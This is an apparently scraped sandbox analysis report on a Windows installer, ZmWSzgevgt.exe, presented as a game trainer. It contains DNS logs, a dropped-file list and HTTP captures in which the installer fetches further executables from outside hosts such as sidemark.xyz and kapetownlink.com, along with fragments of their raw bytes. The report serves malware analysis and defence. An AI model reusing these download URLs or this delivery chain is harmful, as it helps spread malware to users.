Dec 6, 2023 14:33:38.069410086 CET	1.1.1.1	192.168.2.5	0xaa37	No error (0)	ecn.dev.virtualearth.net	ssl2.tiles.virtualearth.net.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2023 14:33:38.069978952 CET	1.1.1.1	192.168.2.5	0x7d4	No error (0)	ecn.dev.virtualearth.net	ssl2.tiles.virtualearth.net.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2023 14:33:38.887682915 CET	1.1.1.1	192.168.2.5	0x8bb5	No error (0)	ecn.dev.virtualearth.net	ssl2.tiles.virtualearth.net.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2023 14:33:38.888761997 CET	1.1.1.1	192.168.2.5	0xcdcf	No error (0)	ecn.dev.virtualearth.net	ssl2.tiles.virtualearth.net.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2023 14:33:41.334212065 CET	1.1.1.1	192.168.2.5	0xbc1	No error (0)	pstbbk.com		157.230.96.32	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:41.350100040 CET	1.1.1.1	192.168.2.5	0x8443	No error (0)	collect.installeranalytics.com		54.165.38.232	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:41.350100040 CET	1.1.1.1	192.168.2.5	0x8443	No error (0)	collect.installeranalytics.com		54.165.145.62	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:41.680780888 CET	1.1.1.1	192.168.2.5	0xac67	No error (0)	allroadslimit.com		104.21.74.109	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:41.680780888 CET	1.1.1.1	192.168.2.5	0xac67	No error (0)	allroadslimit.com		172.67.157.111	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:44.486519098 CET	1.1.1.1	192.168.2.5	0x244f	Server failure (2)	231005002055611.bcn.lca62.shop	none	none	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:44.599749088 CET	1.1.1.1	192.168.2.5	0xd231	No error (0)	ambadevgroup.info		37.1.198.251	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:44.689573050 CET	1.1.1.1	192.168.2.5	0x5a7a	No error (0)	dl.likeasurfer.com		104.21.32.100	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:44.689573050 CET	1.1.1.1	192.168.2.5	0x5a7a	No error (0)	dl.likeasurfer.com		172.67.150.192	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:34:03.516784906 CET	1.1.1.1	192.168.2.5	0x6caa	Name error (3)	111.t.keepitpumpin.io	none	none	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:34:04.193536043 CET	1.1.1.1	192.168.2.5	0x5072	Name error (3)	114.t.keepitpumpin.io	none	none	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:34:04.248850107 CET	1.1.1.1	192.168.2.5	0x7bf0	Name error (3)	115.t.keepitpumpin.io	none	none	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:34:04.720877886 CET	1.1.1.1	192.168.2.5	0x359d	Name error (3)	113.t.keepitpumpin.io	none	none	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:34:04.863791943 CET	1.1.1.1	192.168.2.5	0xf59a	Name error (3)	112.t.keepitpumpin.io	none	none	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:34:04.911576033 CET	1.1.1.1	192.168.2.5	0x10d8	Name error (3)	110.t.keepitpumpin.io	none	none	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:34:08.630311012 CET	1.1.1.1	192.168.2.5	0x43d6	Name error (3)	111.t.keepitpumpin.io	none	none	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:34:09.300792933 CET	1.1.1.1	192.168.2.5	0x1bc	Name error (3)	114.t.keepitpumpin.io	none	none	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:34:09.349328041 CET	1.1.1.1	192.168.2.5	0xc9ab	Name error (3)	115.t.keepitpumpin.io	none	none	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:34:09.828716040 CET	1.1.1.1	192.168.2.5	0x9721	Name error (3)	113.t.keepitpumpin.io	none	none	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:34:09.969491005 CET	1.1.1.1	192.168.2.5	0xba0f	Name error (3)	112.t.keepitpumpin.io	none	none	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:34:10.017132998 CET	1.1.1.1	192.168.2.5	0xa845	Name error (3)	110.t.keepitpumpin.io	none	none	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:34:48.859433889 CET	1.1.1.1	192.168.2.5	0x890e	No error (0)	clients1.google.com	clients.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2023 14:34:48.859433889 CET	1.1.1.1	192.168.2.5	0x890e	No error (0)	clients.l.google.com		142.251.16.138	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:34:48.859433889 CET	1.1.1.1	192.168.2.5	0x890e	No error (0)	clients.l.google.com		142.251.16.113	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:34:48.859433889 CET	1.1.1.1	192.168.2.5	0x890e	No error (0)	clients.l.google.com		142.251.16.139	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:34:48.859433889 CET	1.1.1.1	192.168.2.5	0x890e	No error (0)	clients.l.google.com		142.251.16.101	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:34:48.859433889 CET	1.1.1.1	192.168.2.5	0x890e	No error (0)	clients.l.google.com		142.251.16.102	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:34:48.859433889 CET	1.1.1.1	192.168.2.5	0x890e	No error (0)	clients.l.google.com		142.251.16.100	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:34:48.859795094 CET	1.1.1.1	192.168.2.5	0x32f0	No error (0)	clients1.google.com	clients.l.google.com		CNAME (Canonical name)	IN (0x0001)	false

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2023 14:33:00.564606905 CET	267	OUT	GET /ill.php?p=3890&t=47670100&title=cml2ZXItY2l0eS1yaXZhbC1zaG93ZG93bi10cmFpbmVyLTE1LXYxLTgtLmV4ZQ==&sub=&ps=655ed8e14a15c HTTP/1.1 Connection: Keep-Alive User-Agent: Inno Setup 6.2.2 Host: sparksteam.site
Dec 6, 2023 14:33:01.209007978 CET	916	IN	HTTP/1.1 200 OK Date: Wed, 06 Dec 2023 13:33:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive X-Powered-By: PHP/5.4.16 Cache-Control: no-transform, no-cache, must-revalidate Pragma: no-cache Expires: Sat, 26 Jul 1997 05:00:00 GMT CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WFGhYHhdnCx1b3TedMNxn7xsh2rV5gfZ0yaKDNMdkcFVnbX6Amwih2l2ZuniGERQxTjb1oqrbqzaoR6unTZqpkxmDihnqDqSd6l7P6%2B5k2N3M5XSsArM%2Bt9jANcFdtF7mo0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8314e5eecf76205d-IAD alt-svc: h3=":443"; ma=86400 Data Raw: 68 74 74 70 3a 2f 2f 73 69 64 65 6d 61 72 6b 2e 78 79 7a 2f 70 65 2f 62 75 69 6c 64 49 4e 2e 70 68 70 3f 73 75 62 3d 26 73 6f 75 72 63 65 3d 33 38 39 30 26 73 31 3d 34 37 36 37 30 31 30 30 26 74 69 74 6c 65 3d 63 6d 6c 32 5a 58 49 74 59 32 6c 30 65 53 31 79 61 58 5a 68 62 43 31 7a 61 47 39 33 5a 47 39 33 62 69 31 30 63 6d 46 70 62 6d 56 79 4c 54 45 31 4c 58 59 78 4c 54 67 74 4c 6d 56 34 5a 51 25 33 44 25 33 44 26 74 69 3d 31 37 30 31 38 36 39 35 38 31 Data Ascii: http://sidemark.xyz/pe/buildIN.php?sub=&source=3890&s1=47670100&title=cml2ZXItY2l0eS1yaXZhbC1zaG93ZG93bi10cmFpbmVyLTE1LXYxLTgtLmV4ZQ%3D%3D&ti=1701869581
Dec 6, 2023 14:33:04.002224922 CET	157	OUT	GET /pill.php HTTP/1.1 Connection: Keep-Alive User-Agent: Inno Setup 6.2.2 Host: sparksteam.site
Dec 6, 2023 14:33:05.014228106 CET	651	IN	HTTP/1.1 200 OK Date: Wed, 06 Dec 2023 13:33:04 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 2 Connection: keep-alive X-Powered-By: PHP/5.4.16 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cunHKBJ3wOj18ZSQHFAIKYJ120KGieVd9mqt8V7rGYAbrwADkjN8oy3bOfi%2F5q43XKwuJ3PKU3AQla5z3tI2uBrjDbPQ%2Bxqf93lGNGBCrXKFxqWFmagITCwpkSgDb1Cjlw8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8314e6044f21205d-IAD alt-svc: h3=":443"; ma=86400 Data Raw: 6f 6b Data Ascii: ok

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2023 14:33:01.522250891 CET	278	OUT	GET /pe/buildIN.php?sub=&source=3890&s1=47670100&title=cml2ZXItY2l0eS1yaXZhbC1zaG93ZG93bi10cmFpbmVyLTE1LXYxLTgtLmV4ZQ%3D%3D&ti=1701869581 HTTP/1.1 Connection: Keep-Alive User-Agent: Inno Setup 6.2.2 Host: sidemark.xyz
Dec 6, 2023 14:33:03.386810064 CET	1340	IN	HTTP/1.1 200 OK Date: Wed, 06 Dec 2023 13:33:03 GMT Content-Type: application/force-download Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/5.3.28 Content-Disposition: attachment; filename="65707801b8947_pe.exe" CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KBE8RoeuYz%2Fehhh%2BaZYbGWyko9TJZ1j92aVxMN30%2B5vA86leZHxhPv4cM2ywUaT%2FgoFnN64nhCd1Y9znKZd%2B8UTPKP9bvEzImdLX5sdWGZ0OVob5ix%2FLULeLCUNsDoQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8314e5f4cada576c-IAD alt-svc: h3=":443"; ma=86400 Data Raw: 37 64 30 62 0d 0a 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 18 f2 ec 63 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 52 0b 00 00 5e 01 00 00 00 00 00 ec 5e 0b 00 00 10 00 00 00 70 0b 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 06 00 00 00 06 00 01 00 00 00 00 00 00 80 0d 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 40 0c 00 9a 00 00 00 00 20 0c 00 dc 0f 00 00 00 70 0c 00 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f4 22 0c 00 54 02 00 00 00 30 0c 00 a4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 39 0b 00 00 10 00 00 00 3a 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 88 16 00 00 00 50 0b 00 00 18 00 00 00 3e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a4 37 00 00 00 70 0b 00 00 38 00 00 00 Data Ascii: 7d0bMZP@!L!This program must be run under Win32$7PELcR^^p@@@@ p`"T0.text9: `.itextP> `.data7p8
Dec 6, 2023 14:33:03.386840105 CET	1340	IN	Data Raw: 56 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 e8 6d 00 00 00 b0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 dc 0f 00 00 00 20 0c 00 00 10 00 00 00 8e 0b Data Ascii: V@.bssm.idata @.didata0@.edata@@@.tlsP.rdata]`
Dec 6, 2023 14:33:03.386861086 CET	1340	IN	Data Raw: 31 02 00 cc 10 40 00 04 00 00 00 02 02 44 32 02 00 cc 10 40 00 06 00 00 00 02 02 44 33 02 00 00 00 00 00 08 00 00 00 02 02 44 34 02 00 02 00 05 00 0b f4 ca 40 00 0c 26 6f 70 5f 45 71 75 61 6c 69 74 79 00 00 00 10 40 00 02 12 40 13 40 00 04 4c 65 Data Ascii: 1@D2@D3D4@&op_Equality@@@Left@@Right\|K&op_Inequality@@@Left@@Right\|KEmpty@@\|KCreate@@Data@BigEndian\|KCreate@@
Dec 6, 2023 14:33:03.387182951 CET	1340	IN	Data Raw: 00 fd ff 32 1f 40 00 4a 00 fe ff 5e 1f 40 00 4d 00 ff ff 00 00 07 54 4f 62 6a 65 63 74 26 00 b8 5c 40 00 06 43 72 65 61 74 65 03 00 00 00 00 00 08 00 01 08 88 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 24 00 e8 5c 40 00 04 46 72 65 65 03 00 00 00 Data Ascii: 2@J^@MTObject&\@Create@Self$\@Free@Self)\|KDisposeOf@Self>\@InitInstance@Self@Instance/L]@CleanupInstance@
Dec 6, 2023 14:33:03.387346029 CET	1340	IN	Data Raw: 6a 02 00 02 00 2b 00 b8 5d 40 00 0b 47 65 74 48 61 73 68 43 6f 64 65 03 00 9c 10 40 00 08 00 01 08 88 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 33 00 14 60 40 00 08 54 6f 53 74 72 69 6e 67 03 00 b8 12 40 00 08 00 02 08 88 1f 40 00 00 00 04 53 65 Data Ascii: j+]@GetHashCode@@Self3`@ToString@@Self@@[`@SafeCallException(@@Self@ExceptObject@ExceptAddr1,`@AfterConstruction@Self10`
Dec 6, 2023 14:33:03.387485981 CET	1340	IN	Data Raw: 5c 40 00 a4 5c 40 00 d8 5c 40 00 00 00 02 00 a6 22 40 00 44 00 f4 ff db 22 40 00 44 00 f4 ff 00 00 0f 48 50 50 47 45 4e 41 74 74 72 69 62 75 74 65 35 00 18 7c 4b 00 06 43 72 65 61 74 65 03 00 00 00 00 00 08 00 02 08 20 23 40 00 00 00 04 53 65 6c Data Ascii: \@\@\@"@D"@DHPPGENAttribute5\|KCreate #@Self@ADataD\W@Create #@Self@AFlag@AData$#@HPPGENAttribute"@ @SystemT#@PMonitorT$@h#@
Dec 6, 2023 14:33:03.387619019 CET	1340	IN	Data Raw: 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 6c 27 40 00 08 00 00 00 00 00 00 00 b0 26 40 00 f4 27 40 00 78 27 40 00 00 00 00 00 00 00 00 00 dc 28 40 00 f4 27 40 00 1b 28 40 00 00 00 00 00 39 28 40 00 10 00 00 00 10 17 40 00 b0 5d 40 00 b8 Data Ascii: Fl'@&@'@x'@(@'@(@9(@@]@]@`@`@@@4`@(`@@\@\@@FRefCount!@\@K(@J\|(@J(@KTInterfacedObject1@AfterConstruction
Dec 6, 2023 14:33:03.387692928 CET	1340	IN	Data Raw: 02 00 00 11 40 00 08 00 00 00 02 09 56 44 69 73 70 61 74 63 68 02 00 28 13 40 00 08 00 00 00 02 06 56 45 72 72 6f 72 02 00 58 12 40 00 08 00 00 00 02 08 56 42 6f 6f 6c 65 61 6e 02 00 00 11 40 00 08 00 00 00 02 08 56 55 6e 6b 6e 6f 77 6e 02 00 64 Data Ascii: @VDispatch(@VErrorX@VBoolean@VUnknownd@VShortInt@VByte@VWord@VLongWord@VUInt32@VInt644@VUInt64@VString@V
Dec 6, 2023 14:33:03.387768984 CET	1340	IN	Data Raw: 74 02 00 34 29 40 00 0c 00 00 00 02 09 55 6e 69 74 4e 61 6d 65 73 02 00 02 00 00 00 00 a8 31 40 00 11 13 54 41 72 72 61 79 3c 53 79 73 74 65 6d 2e 42 79 74 65 3e 01 00 00 00 00 00 00 00 11 00 00 00 b4 10 40 00 06 53 79 73 74 65 6d b4 10 40 00 02 Data Ascii: t4)@UnitNames1@TArray<System.Byte>@System@1@TArray<System.Char>L@SystemL@2@TArray<System.Integer>@System@T2@PLibModuleh2@l2@TLibModule
Dec 6, 2023 14:33:03.387866974 CET	1340	IN	Data Raw: 00 8b c0 ff 25 80 23 4c 00 8b c0 ff 25 6c 23 4c 00 8b c0 ff 25 44 24 4c 00 8b c0 ff 25 14 23 4c 00 8b c0 ff 25 64 23 4c 00 8b c0 ff 25 20 23 4c 00 8b c0 ff 25 84 23 4c 00 8b c0 ff 25 40 23 4c 00 8b c0 ff 25 30 23 4c 00 8b c0 ff 25 d4 24 4c 00 8b Data Ascii: %#L%l#L%D$L%#L%d#L% #L%#L%@#L%0#L%$L%#L%D#L%,#L%#L%#L%x#L%"L%$L%$L%($L%#L%d$L%\|$L%X$L%$L%T#Lh 0LYZ$PRQh0L@
Dec 6, 2023 14:33:03.387999058 CET	1340	IN	Data Raw: 0f 83 67 ff ff ff c3 90 90 ba f0 ff ff ff 23 50 fc 81 fa 30 0b 00 00 72 12 e8 0f ff ff ff a1 ec ba 4b 00 ba f0 ff ff ff 23 50 fc 8b 0d f0 ba 4b 00 29 c8 01 ca eb b9 c3 90 53 56 8b d8 e8 8b ff ff ff 6a 04 68 00 10 00 00 68 f0 ff 13 00 6a 00 e8 54 Data Ascii: g#P0rK#PK)SVjhhjTtNKKKJ+5K+K^[3K3^[=YKt?*=Ku!j3xKtj3

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ZmWSzgevgt.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Phishing

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

(copy)

680af9.rbf (copy)

680afa.rbf (copy)

680aff.rbf (copy)

680b04.rbf (copy)

C:\AppData\Roaming\AdvancedWindowsManager\Windows Installer 5.0.3\install\7EB1504\AdvancedWindowsManager.exe

C:\AppData\Roaming\AdvancedWindowsManager\Windows Installer 5.0.3\install\7EB1504\System Updater.msi

C:\AppData\Roaming\AdvancedWindowsManager\Windows Installer 5.0.3\install\7EB1504\Windows Updater.exe

C:\AppData\Roaming\AdvancedWindowsManager\Windows Installer 5.0.3\install\decoder.dll

C:\AppData\Roaming\AdvancedWindowsManager\Windows Installer 5.0.3\install\holder0.aiph

Windows Analysis Report
ZmWSzgevgt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2023 14:33:18.352473974 CET	172	OUT	GET /location/loca.asp HTTP/1.1 Host: geo.netsupportsoftware.com Connection: Keep-Alive Cache-Control: no-cache
Dec 6, 2023 14:33:18.963184118 CET	389	IN	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; Charset=utf-8 Server: Microsoft-IIS/10.0 Access-Control-Allow-Origin: * Set-Cookie: ASPSESSIONIDASCAQTDA=AACDKNODMJHMEPAEJLPIDJLM; path=/ X-Powered-By: ASP.NET X-Frame-Options: SAMEORIGIN Date: Wed, 06 Dec 2023 13:33:18 GMT Content-Length: 16 Data Raw: 33 38 2e 39 30 37 32 2c 2d 37 37 2e 30 33 36 39 Data Ascii: 38.9072,-77.0369

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2023 14:33:19.917646885 CET	198	OUT	GET /track_inl2.php?tim=1701869569&poid=2598&p=1.25 HTTP/1.1 Connection: Keep-Alive User-Agent: Inno Setup 6.2.2 Host: send.planewool.xyz
Dec 6, 2023 14:33:20.771269083 CET	654	IN	HTTP/1.1 200 OK Date: Wed, 06 Dec 2023 13:33:20 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/5.4.16 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TZ3D9WnYWsZ1MtgxUI7%2FwOLIzZDHFPOVzFFSGUllnCZYCQktuI6XjoE5H5Ded9%2BtsvUpt6PcxHpnVLRKqgOKllbT7Pn2KybGtKu5HzcE9S7NkrtabpVNgv5myoNPE03JzWUTOJU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8314e667bd3a3b90-IAD alt-svc: h3=":443"; ma=86400 Data Raw: 33 0d 0a 6f 6b 0a 0d 0a Data Ascii: 3ok
Dec 6, 2023 14:33:20.771294117 CET	59	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2023 14:33:20.874691963 CET	236	OUT	GET /ar.php?d=inno&r=offer_execution&rk=yes&o=1627&a=2598&dn=286&spot=1&t=1701869569 HTTP/1.1 Connection: Keep-Alive User-Agent: Inno Setup 6.2.2 Host: false.apparelsilver.xyz
Dec 6, 2023 14:33:21.014807940 CET	654	IN	HTTP/1.1 200 OK Date: Wed, 06 Dec 2023 13:33:20 GMT Content-Type: text/plain Content-Length: 2 Connection: keep-alive X-Powered-By: PHP/5.5.38 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wz55zPBU2YwWzmIibnFRsl8FrUXEIlO6JQS%2Fh%2B2fOUxNBcDsA759aHik%2BiiV1eGX5xTKdkNq%2BZA5RMh6gIYGAKxBXyErP0G1gY7FVR7mSI7eDVG82ibdhGBfLsCyJAHoMfJpGcA56KnyGg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8314e66db91d07dd-IAD alt-svc: h3=":443"; ma=86400 Data Raw: 6f 6b Data Ascii: ok
Dec 6, 2023 14:33:43.865945101 CET	234	OUT	GET /ar.php?d=inno&r=offer_execution&rk=no&o=331&a=2598&dn=244&spot=2&t=1701869569 HTTP/1.1 Connection: Keep-Alive User-Agent: Inno Setup 6.2.2 Host: false.apparelsilver.xyz
Dec 6, 2023 14:33:43.992799997 CET	648	IN	HTTP/1.1 200 OK Date: Wed, 06 Dec 2023 13:33:43 GMT Content-Type: text/plain Content-Length: 2 Connection: keep-alive X-Powered-By: PHP/5.5.38 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=G5WXcle%2BIB79KRs312rybeO0JKOrGENuJoavuxUexKnCmkQfltTDy8Ch4vSprdfvm2VZsGcqq8FSIoNoo6ltU2iOt3i5LJCoTHiVNUjvnqVDFN35WfuhttxZfwdPdOJxc6UKgpthD71EqQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8314e6fd68a807dd-IAD alt-svc: h3=":443"; ma=86400 Data Raw: 6f 6b Data Ascii: ok

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2023 14:33:21.309020042 CET	208	OUT	HEAD /installer.exe HTTP/1.1 Accept: / User-Agent: InnoDownloadPlugin/1.5 Host: kapetownlink.com Connection: Keep-Alive Cache-Control: no-cache
Dec 6, 2023 14:33:21.496566057 CET	323	IN	HTTP/1.1 200 OK Server: nginx/1.10.0 (Ubuntu) Date: Wed, 06 Dec 2023 13:33:21 GMT Content-Type: application/octet-stream Content-Length: 4724720 Last-Modified: Mon, 24 Jul 2023 06:14:10 GMT Connection: keep-alive ETag: "64be16b2-4817f0" Accept-Ranges: bytes
Dec 6, 2023 14:33:21.497165918 CET	207	OUT	GET /installer.exe HTTP/1.1 Accept: / User-Agent: InnoDownloadPlugin/1.5 Host: kapetownlink.com Connection: Keep-Alive Cache-Control: no-cache
Dec 6, 2023 14:33:21.681030035 CET	1340	IN	HTTP/1.1 200 OK Server: nginx/1.10.0 (Ubuntu) Date: Wed, 06 Dec 2023 13:33:21 GMT Content-Type: application/octet-stream Content-Length: 4724720 Last-Modified: Mon, 24 Jul 2023 06:14:10 GMT Connection: keep-alive ETag: "64be16b2-4817f0" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d6 e7 ac 00 92 86 c2 53 92 86 c2 53 92 86 c2 53 41 f4 c1 52 9f 86 c2 53 41 f4 c7 52 2b 86 c2 53 41 f4 c4 52 93 86 c2 53 f0 fe c6 52 81 86 c2 53 f0 fe c1 52 8a 86 c2 53 f0 fe c7 52 fa 86 c2 53 41 f4 c6 52 88 86 c2 53 41 f4 c3 52 91 86 c2 53 41 f4 c5 52 93 86 c2 53 92 86 c3 53 4f 84 c2 53 12 ff cb 52 df 87 c2 53 12 ff 3d 53 93 86 c2 53 92 86 55 53 93 86 c2 53 12 ff c0 52 93 86 c2 53 52 69 63 68 92 86 c2 53 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 47 fb 67 62 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 1f 00 ae 21 00 00 ee 0d 00 00 00 00 00 44 9e 19 00 00 10 00 00 00 c0 21 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2f 00 00 04 00 00 27 f7 48 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 19 2a 00 28 00 00 00 00 c0 2a 00 c0 bc 02 00 00 00 00 00 00 00 00 00 78 fc 47 00 78 1b 00 00 00 80 2d 00 18 5b 02 00 18 ab 24 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 ab 24 00 18 00 00 00 a8 df 21 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 21 00 cc 02 00 00 18 ed 29 00 60 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1f ad 21 00 00 10 00 00 00 ae 21 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 64 69 08 00 00 c0 21 00 00 6a 08 00 00 b2 21 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c8 8b 00 00 00 30 2a 00 00 6a 00 00 00 1c 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c0 bc 02 00 00 c0 2a 00 00 be 02 00 00 86 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 18 5b 02 00 00 80 2d 00 00 5c 02 00 00 44 2d 00 00 00 00 00 00 00 00 00 00 00 